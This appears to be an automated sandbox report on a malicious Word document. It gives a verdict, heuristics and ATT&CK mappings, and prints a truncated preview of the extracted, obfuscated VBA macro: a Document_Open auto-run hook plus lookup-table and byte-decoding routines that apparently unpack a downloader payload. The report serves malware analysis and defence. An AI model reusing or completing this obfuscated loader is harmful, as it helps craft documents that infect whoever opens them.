Verdict: MALICIOUS
Risk Score: 162
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and VBA p-code auto-execution further supports this. The VBA script itself is heavily obfuscated with complex arithmetic operations and loops, making its exact payload difficult to determine, but its structure strongly suggests it's designed to download and execute a secondary malicious file.
Heuristics (5)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11371 bytes | 576dc1194c588a1298a0c035558fa69c13a5f38afe7fe941c73681ad5038df45 |
Preview script: first 1,000 lines of the extracted script (the dump ends where the analyzer truncated it)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Auto-execution entry point: runs when the document is opened.
Private Sub Document_Open()
    Dim stairwell As Long
    Dim torr As Byte
    sashimi    ' call to a procedure not shown in this preview
    prolusion = 21 + 32
    Pmt 0, prolusion, 35671, 43112, 6    ' financial function called as a statement, result discarded (noise)
End Sub

Attribute VB_Name = "algolagnic"

' Builds a 256-entry byte lookup table from arithmetic-obfuscated constants.
Function semite()
    Dim dicksonia(255) As Byte
    pseudemys = 67 - 41 + 39
    For i = pseudemys To (117 - 26 + 0)
        dicksonia(pseudemys) = pseudemys - (14 - 45 + 96)
        pseudemys = pseudemys + 1
        If (117 - 5 - 21) < pseudemys Then
            bookful = exogamy + 60 - 59 + 64    ' dead assignment (noise)
            Exit For
        End If
        anywhere = cates + 77 - 116 + 104    ' dead assignment (noise)
    Next
    pseudemys = (86 - 69 + 31)
    For i = pseudemys To (77 - 75 + 56)
        dicksonia(pseudemys) = pseudemys + (56 - 101 + 49)
        pseudemys = pseudemys + 1
        If (105 - 70 + 23) < pseudemys Then
            posthaste = beneficed + 44 - 96 + 117
            Exit For
        End If
        accelerate = aphony + 93 - 83 + 55
    Next
    pseudemys = (22 - 110 + 185)
    For i = pseudemys To (84 - 85 + 124)
        dicksonia(pseudemys) = pseudemys - (15 - 14 + 70)
        pseudemys = pseudemys + 1
        apposition = narthex + 108 - 39 - 4
        If (78 - 67 + 112) < pseudemys Then
            bushed = northnorthwest + 110 - 26 - 19
            Exit For
        End If
        runway = convinced + 88 - 95 + 72
    Next
    dicksonia(123 - 17 - 59) = (31 - 14 + 46)
    pseudemys = (91 - 2 - 46)
    dicksonia(pseudemys) = (2 - 94 + 154)
    semite = dicksonia
End Function

Function gengr(achenial)
    gengr = AscW(achenial)
End Function

' Operator dispatcher: selector 31 = integer division, 41 = bitwise And, 49 = multiply.
Function dismask(markup, frugally, ominous)
    Select Case ominous
        Case 31 + (10 / 2 - 5)
            dismask = markup \ frugally
        Case 41 + (5 - 3) / 2 - 1
            dismask = markup And frugally
        Case 49 + (56 / 7 - 4 * 2)
            dismask = markup * frugally
    End Select
End Function

' Decoding routine: transforms the input string byte-by-byte into the expressman buffer.
Function agglomeration(cryptogamia) As String
    Dim manta As Integer
    Dim boron As Long
    Dim expressman(6962) As Byte
    Dim duffer As Long
    Dim dishpan(63) As Long
    Dim versed As Long
    Dim motherinlaw(63) As Long
    Dim vizor As Long
    Dim terrorist() As Byte
    Dim enclosure(63) As Long
    honeymoon = "sneeringly"
    Dim magnificat As String
    verandah = 29 - 83 + 309
    russet = 103 - 126 + 4119
    grasseating = 23 - 78 + 16711735
    placatingly = 108 - 55 + 262091
    Dim tannin As String
    ungrasped = 33 - 21 + 52
    myeloma = 115 - 103 + 4020
    arietation = 3 - 128 + 65661
    omsk = 95 - 3 + 65188
    regally = 37 - 66 + 258077
    Dim corporality As Byte
    miscegenate = 105 - 115 + 266
    anil = 100 - 82 + 45
    Dim pothunter As Variant
    succeeding = 107 - 89 + 16515054
    Dim ecstasis As Variant
    binocular = 118 - 87 + 7812
    Dim eddy() As Byte
    eddy = VBA.StrConv(cryptogamia, 120 + 8)    ' 128 = vbFromUnicode: string to byte array
    helve = 53 + 1
    Pmt 0, helve, 33779, 53282, 4
    crusher = 7843
    adrolepsy = vbKeyShift - 12
    ' First pass: subtract an alternating constant from each byte.
    For athapaskan = 0 To crusher
        If athapaskan Mod 2 = 0 Then
            eddy(athapaskan) = eddy(athapaskan) - adrolepsy
        Else
            eddy(athapaskan) = eddy(athapaskan) - (adrolepsy - 1)
        End If
    Next athapaskan
    bantamcock = 23 + 23
    Pmt 0, bantamcock, 11888, 50720, 4
    manta = 0
    arab = semite
    ' Multiplier tables used by the main decode loop.
    For duffer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
        dishpan(duffer) = dismask(duffer, ungrasped, 49)
        motherinlaw(duffer) = dismask(duffer, russet, 49)
        enclosure(duffer) = dismask(duffer, placatingly, 49)
    Next duffer
    loaf = 39 + 10
    Pmt 0, loaf, 26984, 58453, 2
    terrorist = eddy
    sarcostemma = 115 - 122 + 11
    pyrrhus = 44 + 27
    Pmt 0, pyrrhus, 28780, 13181, 2
    dasyurus = 81 - 3 - 75
    actinidia = mimium / 303
    abysm = honeymoon
    anagogic = dasyurus + 1
    gladly = 109 - 123 + 16
    ' Main decode loop: combines lookup-table values, masks them, and writes output bytes.
    For vizor = 0 To crusher
        inexcitable = terrorist(vizor)
        anaphrodisiac = terrorist(vizor + 2)
        downtoearth = motherinlaw(arab(terrorist(vizor + 1)))
        aired = dishpan(arab(anaphrodisiac)) + arab(terrorist(vizor + dasyurus))
        versed = enclosure(arab(inexcitable)) + downtoearth + aired
        duffer = dismask(versed, grasseating, 41)
        expressman(boron) = dismask(duffer, arietation, 31)
        duffer = dismask(versed, omsk, 41)
        expressman(boron + 1) = dismask(duffer, miscegenate, 31)
        expressman(boro ... (truncated)
```